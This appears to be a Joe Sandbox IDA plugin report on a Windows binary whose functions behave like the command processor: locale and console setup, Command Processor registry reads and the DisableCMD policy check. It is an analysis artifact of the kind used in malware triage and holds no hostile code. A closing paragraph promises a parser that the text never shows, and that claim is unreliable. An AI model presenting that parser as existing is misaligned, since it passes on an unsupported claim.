20836->20838 20837->20838 20857 19ab7f 20837->20857 20838->20794 20841 19acb0 448 API calls 20842 1a1dc2 20841->20842 20843 1a01f5 wcsrchr 20842->20843 20848 1a1dd1 20843->20848 20844 1af106 20845 1a1e4a 20846 19dc60 2 API calls 20845->20846 20846->20838 20847 1a1e11 _wcsnicmp 20847->20848 20848->20844 20848->20845 20848->20847 20848->20848 20850 1bb35b __aulldvrm 20849->20850 20850->20850 20851 1bb42e 20850->20851 20853 1bb3f4 memmove 20850->20853 20852 1bb445 wcsncmp 20851->20852 20854 1bb432 20851->20854 20852->20854 20853->20850 20855 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20854->20855 20856 1bb4f8 20855->20856 20856->20788 20858 19abaa 20857->20858 20861 19ab88 20857->20861 20858->20841 20859 19ab89 iswspace 20860 19ab98 wcschr 20859->20860 20859->20861 20860->20858 20860->20861 20861->20858 20861->20859 20861->20860 20863 19dc60 2 API calls 20862->20863 20864 19c3fb 20863->20864 20865 19dc60 2 API calls 20864->20865 20866 19c0df 20865->20866 20866->20697 20868 1b7660 20867->20868 20869 1b7679 20867->20869 20870 1a6e25 4 API calls 20868->20870 20869->20719 20869->20731 20869->20736 20870->20869 20871->20736 20873 1b8727 20872->20873 20878 1b8781 20872->20878 20874 19998d 448 API calls 20873->20874 20877 1b8736 20874->20877 20875 199950 448 API calls 20875->20877 20876 19998d 448 API calls 20876->20877 20877->20875 20877->20876 20877->20878 20880 199950 448 API calls 20879->20880 20881 1b86f9 20880->20881 20882 1b871d 448 API calls 20881->20882 20883 1b8702 20882->20883 20884 1b8791 448 API calls 20883->20884 20885 1b870d 20884->20885 20886 1b8791 448 API calls 20885->20886 20887 1b8718 20886->20887 20887->20294 20889 19adc6 20888->20889 20893 1acc3f 20888->20893 20890 1a5a2e memset 20889->20890 20892 19add1 20890->20892 20891 1acc6a GetLastError 20891->20893 20892->20893 20895 19e3f0 17 API calls 20892->20895 20893->20891 20894 1978e4 448 API calls 20893->20894 20897 1a61e6 ??_V@YAXPAX 20893->20897 20894->20893 20896 19adef 20895->20896 
20896->20893 20898 19b0b9 20896->20898 20899 19ae05 20896->20899 20897->20893 20900 1a0b12 5 API calls 20898->20900 21139 19e950 memset 20899->21139 20902 19b0c1 20900->20902 20902->20893 21268 197f47 memset 20902->21268 20904 19b118 21282 1a21ee 20904->21282 20905 19ae23 20905->20893 20909 1acc7c 20905->20909 20915 19ae44 20905->20915 20913 1a61e6 ??_V@YAXPAX 20909->20913 20910 19b11f 21286 1a2940 20910->21286 20911 19b0dc towupper 20914 19b100 20911->20914 20912 19aea1 20912->20893 20928 19af6b 20912->20928 20934 19aecb wcschr 20912->20934 20940 19b176 20912->20940 20941 19b13b 20912->20941 20913->20912 20914->20904 20914->20914 20917 1acc75 20914->20917 20915->20912 20918 19bc30 448 API calls 20915->20918 20919 1b9a7d 448 API calls 20917->20919 20920 19ae86 20918->20920 20919->20909 20923 19ae91 20920->20923 20925 19b00e wcsncmp 20920->20925 20921 19afc2 21196 19b17b 20921->21196 20923->20912 20927 19a800 449 API calls 20923->20927 20925->20912 20925->20923 20926 1a61e6 ??_V@YAXPAX 20930 19afe8 20926->20930 20927->20912 21168 19b1b0 20928->21168 20932 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20930->20932 20936 19b002 20932->20936 20933 1a0b12 5 API calls 20933->20941 20934->20912 20954 19b033 20934->20954 20935 19af83 20938 19af99 20935->20938 20939 19afc4 20935->20939 20936->18661 20942 19b02c 20938->20942 20943 19afa5 20938->20943 21190 19aa50 20939->21190 20948 1978e4 448 API calls 20940->20948 20941->20912 20941->20933 20941->20940 20949 197f47 23 API calls 20941->20949 20958 1accc9 GetLastError 20941->20958 21200 19c6c0 20942->21200 20945 19b085 20943->20945 20946 19afb1 20943->20946 21253 199dc0 20945->21253 20951 19afbd 20946->20951 20952 19b0a2 20946->20952 20948->20893 20949->20941 21187 199770 20951->21187 20952->20910 20956 19b0aa 20952->20956 20953 19b031 20953->20921 20954->20945 20955 19b193 20954->20955 20959 1a6c78 4 API calls 20955->20959 21172 1959a0 20956->21172 20958->20940 20959->20940 20962 19e683 20961->20962 20963 
19e6c6 20961->20963 20962->20963 20964 19e689 20962->20964 20967 19e71d 20962->20967 20968 19e6ec 20962->20968 20973 19e733 20962->20973 20963->18631 22134 19e790 20964->22134 20972 19e790 457 API calls 20967->20972 20968->20963 20971 19e790 457 API calls 20968->20971 20969 19e790 457 API calls 20974 19e6ad 20969->20974 20970 19e790 457 API calls 20970->20963 20971->20968 20972->20973 20973->20963 20973->20970 20974->20963 20975 19e790 457 API calls 20974->20975 20975->20974 20977 1a03cb 20976->20977 20978 1a03e1 20977->20978 20979 1ae7bf iswdigit 20977->20979 20980 1a03f3 20978->20980 20981 1a0416 20978->20981 20979->20977 20982 1ae7e2 20979->20982 22148 1a15f0 20980->22148 20986 1a03f8 20981->20986 22152 1a2960 wcstol wcstol 20981->22152 20985 1978e4 448 API calls 20982->20985 20987 1a040d 20985->20987 20988 19e470 916 API calls 20986->20988 20987->18661 20988->20987 20990 19e470 917 API calls 20989->20990 20991 19ab63 20990->20991 20992 19ab76 20991->20992 20993 19e470 917 API calls 20991->20993 20992->18661 20993->20992 20995 19e3f0 17 API calls 20994->20995 21009 199f61 20995->21009 20996 19a0d9 20997 19a0ef 20996->20997 20998 19a0e7 ??_V@YAXPAX 20996->20998 21000 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20997->21000 20998->20997 20999 199fd7 21002 19dcd0 448 API calls 20999->21002 21027 199ff4 20999->21027 21001 19a0fe 21000->21001 21001->18635 21001->18649 21002->21027 21003 1a0060 5 API calls 21003->21009 21005 1ac376 _get_osfhandle SetFilePointer 21006 1ac392 21005->21006 21005->21027 21010 199abf _vsnwprintf 21006->21010 21008 19a02b _get_osfhandle 21011 19a03d _get_osfhandle 21008->21011 21008->21027 21009->20996 21009->20999 21009->21003 21012 1ac3a9 21010->21012 21011->21027 21017 1978e4 448 API calls 21012->21017 21013 1ac439 21015 199abf _vsnwprintf 21013->21015 21014 19a16c _close 21014->21027 21015->21012 21016 19dd98 6 API calls 21016->21027 21018 1ac463 21017->21018 21019 19a125 2 API calls 21018->21019 21019->20996 21020 

Control-flow Graph (legend: Executed / Not Executed; graph edge data omitted)
APIs

• Part of subcall function 00198791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00196906,0000001F,?,00000080), ref: 00198791
• GetLocaleInfoW.KERNELBASE(00000000,0000001E,001CC9E0,00000008), ref: 0019859E
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 001985BC
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00198614
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00198653
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,001CC9D0,00000008), ref: 0019867D
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,001CC970,00000020), ref: 00198698
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,001CC930,00000020), ref: 001986B0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,001CC8F0,00000020), ref: 001986C8
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,001CC8B0,00000020), ref: 001986E0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,001CC870,00000020), ref: 001986F8
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,001CC830,00000020), ref: 00198710
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,001CC7F0,00000020), ref: 00198728
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,001CC9C0,00000008), ref: 00198743
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,001CC9B0,00000008), ref: 0019875B
                                                                                                                                                                                                                          • setlocale.MSVCRT ref: 00198770
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                          • Opcode ID: 9f0c252364704bf2b6261c4fdbfa289717e70fff67b83e7a7d6f421ac524a094
                                                                                                                                                                                                                          • Instruction ID: 9c3accf7d20d72720308481c01f0de66fc8de84ab196e03a6b6bf05b9a832922
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f0c252364704bf2b6261c4fdbfa289717e70fff67b83e7a7d6f421ac524a094
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEC1E579704292A6DF348F358E88B7B37ECAF56754F24012AE846EA586EB74CD41C360

                                                                                                                                                                                                                          Control-flow Graph
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 001A0297
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 001A02B0
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 001A0311
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001A0367
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001AE746
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 242869866-0
                                                                                                                                                                                                                          • Opcode ID: 1323327dfe43e077fb4fee780b6da70f9b7ef1a3dc9051bf011baba41f29c5a6
                                                                                                                                                                                                                          • Instruction ID: f504163ede72bfa97925494d4517b4fef18f937b81f583ddbf88ac157452e92e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1323327dfe43e077fb4fee780b6da70f9b7ef1a3dc9051bf011baba41f29c5a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851B0796083018BCB25DF68DC486ABB7E5BFD9310F15491EF889C3240E731D945CB96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 001A6EC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                          • Opcode ID: e4ecb49bf7041c97c1c48806948eebf0523ec99017c2f3964740cd8c2df34c8f
                                                                                                                                                                                                                          • Instruction ID: 40bb66ee1317b790b9bbb30ae5679053e7a699bb811d6a0f50c4f9cab25ce0f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ecb49bf7041c97c1c48806948eebf0523ec99017c2f3964740cd8c2df34c8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 939002A829310086D700E7719C0940577B15F496027854452F051C5454DB6C40445526

                                                                                                                                                                                                                          Control-flow Graph
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001CCA04), ref: 001987EE
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001987FA
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0019880E
                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001B7460,00000001), ref: 0019881B
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00198828
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00198830
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019883C
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 00198844
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E318
                                                                                                                                                                                                                            • Part of subcall function 0019E310: SetConsoleMode.KERNELBASE(00000000), ref: 0019E322
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E32F
                                                                                                                                                                                                                            • Part of subcall function 0019E310: GetConsoleMode.KERNELBASE(00000000), ref: 0019E339
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E35E
                                                                                                                                                                                                                            • Part of subcall function 0019E310: GetConsoleMode.KERNELBASE(00000000), ref: 0019E368
                                                                                                                                                                                                                            • Part of subcall function 0019E310: _get_osfhandle.MSVCRT ref: 0019E390
                                                                                                                                                                                                                            • Part of subcall function 0019E310: SetConsoleMode.KERNELBASE(00000000), ref: 0019E39A
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0019A9C5), ref: 0019A9D8
                                                                                                                                                                                                                            • Part of subcall function 0019A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0019A9F3
  • Part of subcall function 0019A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0019A9FA
  • Part of subcall function 0019A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0019AA09
  • Part of subcall function 0019A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0019AA12
  • Part of subcall function 00198B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0019885E), ref: 00198B9D
  • Part of subcall function 00198B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019885E), ref: 00198BA4
  • Part of subcall function 00198273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001982D3
  • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00198313
  • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0019834D
  • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0019839D
  • Part of subcall function 00198273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 001983D7
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0019886A
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001988A5
• GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00198987
• GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 001989AB
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001989BC
  • Part of subcall function 00198572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,001CC9E0,00000008), ref: 0019859E
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 001985BC
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00198614
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00198653
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,001CC9D0,00000008), ref: 0019867D
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,001CC970,00000020), ref: 00198698
  • Part of subcall function 00198572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,001CC930,00000020), ref: 001986B0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 001989CD
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001989D4
• GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 001989E9
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00198A23
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00198A2A
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00198AB5
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00198AC0
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00198AD1
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00198AE7
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00198AF8
• free.MSVCRT(?), ref: 00198B18
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
• String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
• API String ID: 3313898297-3021193919
• Opcode ID: 25de36c548135f6164a7730c1f80b04f65100edd9ecae307881b6b1233e4705a
• Instruction ID: 4fac90d609145e5355a29b066c7d880ed340bce1c6ac3aa8895e7554f6c89395
• Opcode Fuzzy Hash: 25de36c548135f6164a7730c1f80b04f65100edd9ecae307881b6b1233e4705a
• Instruction Fuzzy Hash: 5B91BE71A02301ABDF14EBA4AC1AEBE37A5EF95700B44441AF506DB6A1EF70DD81CB52

Control-flow Graph (function 198273; graph image not reproduced)

APIs
• RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001982D3
• RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00198313
• RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0019834D
• RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0019839D
• RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 001983D7
• RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00198427
• RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00198498
• RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00198526
• RegCloseKey.KERNELBASE(?), ref: 0019853A
• time.MSVCRT(00000000), ref: 00198554
• srand.MSVCRT ref: 0019855B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor$p~du
• API String ID: 145004033-181855750
• Opcode ID: e1bc1e7d19e362915e0b33f60464a3258956ff7b93db41c1a00e7012ea8db1ab
• Instruction ID: afa8372a93c5bdc8dcc848fe255474b9c2a7fc36b60c79351fdaf0d93e6602ae
• Opcode Fuzzy Hash: e1bc1e7d19e362915e0b33f60464a3258956ff7b93db41c1a00e7012ea8db1ab
• Instruction Fuzzy Hash: F2C1A039905299EAEF329B50DD44BD977B8FF19702F1040E7E689A2090DBB49EC8CF15

Control-flow Graph (function 1a09b1; graph image not reproduced)

APIs
• GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001A09CB
• OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 001A09D8
  • Part of subcall function 0019E2AF: SetThreadUILanguage.KERNELBASE ref: 0019E2C6
• HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 001A09ED
• RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 001A0A0A
• _setjmp3.MSVCRT ref: 001A0A72
• GetConsoleOutputCP.KERNELBASE ref: 001A0AA3
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A0AB4
• exit.KERNELBASE ref: 001A0ADA
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 001AE9E1
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001AE9EA
  • Part of subcall function 001A1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,001AEF7C,?,00000000,00000000), ref: 001A1FB2
  • Part of subcall function 001A1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,001AEF7C,?,00000000,00000000), ref: 001A1FCE
  • Part of subcall function 001A1F1A: GetConsoleOutputCP.KERNELBASE(001A0A41), ref: 001A1F1A
  • Part of subcall function 001A1F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A1F2B
  • Part of subcall function 001A1F1A: memset.MSVCRT ref: 001A1F45
  • Part of subcall function 001987CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001CCA04), ref: 001987EE
  • Part of subcall function 001987CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001987FA
  • Part of subcall function 001987CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0019880E
  • Part of subcall function 001987CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001B7460,00000001), ref: 0019881B
                                                                                                                                                                                                                            • Part of subcall function 001987CA: _get_osfhandle.MSVCRT ref: 00198828
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetConsoleMode.KERNELBASE(00000000), ref: 00198830
                                                                                                                                                                                                                            • Part of subcall function 001987CA: _get_osfhandle.MSVCRT ref: 0019883C
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetConsoleMode.KERNELBASE(00000000), ref: 00198844
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0019886A
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001988A5
                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 001AEA5E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System$p~du
                                                                                                                                                                                                                          • API String ID: 4238206819-4036716130
                                                                                                                                                                                                                          • Opcode ID: b91f48a2c5ba4f263f6519f9c2466ebff0e4558c15f93a8fe9c2f631fc1b7602
                                                                                                                                                                                                                          • Instruction ID: 449445fb3098e925f3e935f87777d7afb7b09e7249941bf5c4b894c09fbf66fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b91f48a2c5ba4f263f6519f9c2466ebff0e4558c15f93a8fe9c2f631fc1b7602
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9719479541305AFEB15EB70DC46EBF3BE9FF1A344B14052AF502E2591EB34C8808A61
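The "APIs" listing above is the part of each function record a triager actually reads: one line per imported call, with the resolved module, the argument immediates the disassembler could recover ("?" where it could not), the call-site address, and an indented "Part of subcall function" prefix when the call happens one level down. What follows is an added parser for that listing, not code from the Joe Sandbox report or its IDA plugin; the sample lines are copied from the listing above (the selection is mine), and the regex, the ApiCall record and the helper names are my own. It flags Reg* calls that carry a literal value name, which is how the DisableCMD lookup stands out among otherwise unresolved arguments.

```python
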